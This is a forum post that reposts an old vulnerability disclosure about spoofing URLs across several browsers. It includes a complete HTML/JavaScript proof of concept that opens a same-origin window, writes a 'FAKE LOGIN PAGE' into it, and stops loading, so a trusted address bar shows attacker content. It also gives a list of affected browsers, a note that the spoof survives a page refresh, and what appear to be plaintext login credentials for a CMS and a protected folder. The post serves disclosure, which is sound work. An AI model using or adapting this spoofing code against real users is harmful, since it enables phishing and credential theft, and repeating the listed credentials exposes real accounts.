Professional Webmasters Community
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Professional Webmasters Community

your are free to explore your reviews, thoughts, suggestion and guidelines on every online tech talk.


Multiple Browsers Fake url folder & file Same origin Spoof

Professional Webmasters Community :: Webmaster Speak :: Tech Talk

Go down

Multiple Browsers Fake url folder & file Same origin Spoof Empty Multiple Browsers Fake url folder & file Same origin Spoof

Post  andry Wed Oct 06, 2010 5:52 am


#########################################
Multiple Browsers Fake url folder & file Same origin Spoof
##########################################

##############
Abstract
##############

One user open his browser and try to navigate to
http://www.host.com/admin/admin.php this url is in
the remote server and if the user has privileges ,
can access to file admin.php

If the file admin.php isn`t in the server
the user get a 404 http error by server.

If the user try to browse http://www.host.com/admin/
and this path isn´t in the server , the user get again a 404
http error.

If the user press refresh button the page reloads the content
and if the user press ctrl+f5 it refresh all content from
the page.

Some times those http errors like 404 ,403 etc are managed
by a third part app, a toolbar, or with a predefined
dynamic content build inside the browser.

#######################
Explanation
#######################

Multiple browsers have a flaw in this request response
that allow a attacker to spoof the url or spoof the content
from a inexistent file or path or spoof the url and content
from a trust file or Path.

Also a attacker can "trap" the broser in spoofed web and
wen the user press f5 or refresh button , the page show
the spoofed content or if the user press ctrl+f5 the page
show the spoofed content , Only in Opera Browser this last
issue does not work.


##################
Testing
##################

I test it with windows xp home sp3 fully patched.
for testing let´s to write some script like:

####################
SOURCE CODE OF POC
####################
online PoC =>http://cmspatch.200u.com/urlspoof.html

Code:

<html>
<head></head><body>
<title>Multiple Browsers Fake url folder & file Same Origin Spoof</title>
<center>
<h1>Multiple Browsers Fake url folder & file Same origin Spoof </h1>
</center>
<p>
<a href='modules/profile/admin/admin.php' target='_blank'><h2>real path</h3></a>
<a href='javascript:spoofolder()'><h2>spoof a url folder !!</h2></a> Non existent path
<a href='javascript:spoofile()'><h2>spoof a url file !!</h2></a>  this file exist in the server.
<a href='javascript:spoofauth()'><h2>spoof a url with auth basic !!</h2></a><br>only exist Protected and have password.
<p></p>
<strong>pass for the cms. user Dismark pass souaktendio.</strong><br>
<strong>pass for Portected folder. user terrapro pass mayoristas.</strong>
<p>

<script>
function spoofolder()
{
a = window.open('modules/login')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
function spoofile()
{
a = window.open('modules/system/admin.php')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
function spoofauth()
{
a = window.open('protected/admin/admin.php')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
</script>
</body></html>

######## END SOURCE #####

Save it as c:/test/urlspoof.html for example.
I use one alert for show the real window.location.
for testing i have open the file using file:/// protocol handler
and for remote test i have upload the file to a server.
to a apache in windows 2003 and in a apache on linux red hat.

server windows:
Windows Server 2003
Apache/2.2.8 Win32
PHP/5.2.6
Server at ***********.com

server linux:

Apache/2.2.11 (Unix) mod_ssl/2.2.11
OpenSSL/0.9.8e-fips-rhel5
mod_auth_passthrough/2.1
FrontPage/5.0.2.2635 Server
at ***********.com

in all test cases the server send the correct
http response.

########################
Localy afected Browsers
########################

For this test i use file protocol handler and
only test file spoof and path spoof.

1 - Firefox 3.5.1 and 3.5.2
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in al cases firefox show the spoofed
url and content.(firefox 3.5.2 seems not vulnerble)

2 - Lunascape 5.1.3 and 5.1.4 (swiched to Trident engine)
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in al cases Lunascape show the
spoofed url and content spoofed.

3 - Orca browser 1.2 build 2 seems not vulnerable ,but wen browse the file
the browsers add to url wyciwyg://4/ and executes the fake content.

4 - Flock 2.5.1
open urlspoof via file c:/test/urlspoof.html and clik
in any spoof function in all cases Flock show the
spoofed url and content spoofed.

5 - K-Meleon 1.5.3
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in all cases K-Meleon show the
spoofed url and content spoofed.

6 - SeaMonkey 1.1.17
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in all cases SeaMonkey show the
spoofed url and content spoofed.

7 - Avant browser 11.7 build 36
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in all cases Avant show the
spoofed url and content spoofed.


Google chrome 2.0.172.39 (Build oficial )
write in all tree cases in about:blank.

Internet Explorer 8 seems not vulnerable via file: protocol


########################
Remote afected Browsers
########################

For this test up the file to a server
and browse to file via http://host.com/urlspoof.html

1 - Internet explorer 7 and 8
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.

2 - Avant browser 11.7 build 35 and build 36
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.

3 - Lunascape 5.1.3 and 5.1.4 (swiched to Trident engine)
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.

4 - Maxthon Browser 2.5.3.80 UNICODE
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.

Google chrome write in all cases in about:blank

#################
Trap issue
#################

All of afected browsers , wen you are in the Fake url
wen you try to reload or refresh the location , via ctrl+f5
or f5 or similar the browser not show a 404 http error,
it continue showing the fake page location.
it is very interesting , because a attacker can create a "ghost" file
in a "ghost" path.
in the case of the fake File, we can spoof any web page on the server
with the fake page and wen the user try to reload it or refresh
the browser shows the fake page not the real page location.

##################€nd ##################
andry
andry
Moderator
Moderator

Posts : 467
Join date : 2010-05-07

Back to top Go down

Back to top

- Similar topics

Professional Webmasters Community :: Webmaster Speak :: Tech Talk

 
Permissions in this forum:
You cannot reply to topics in this forum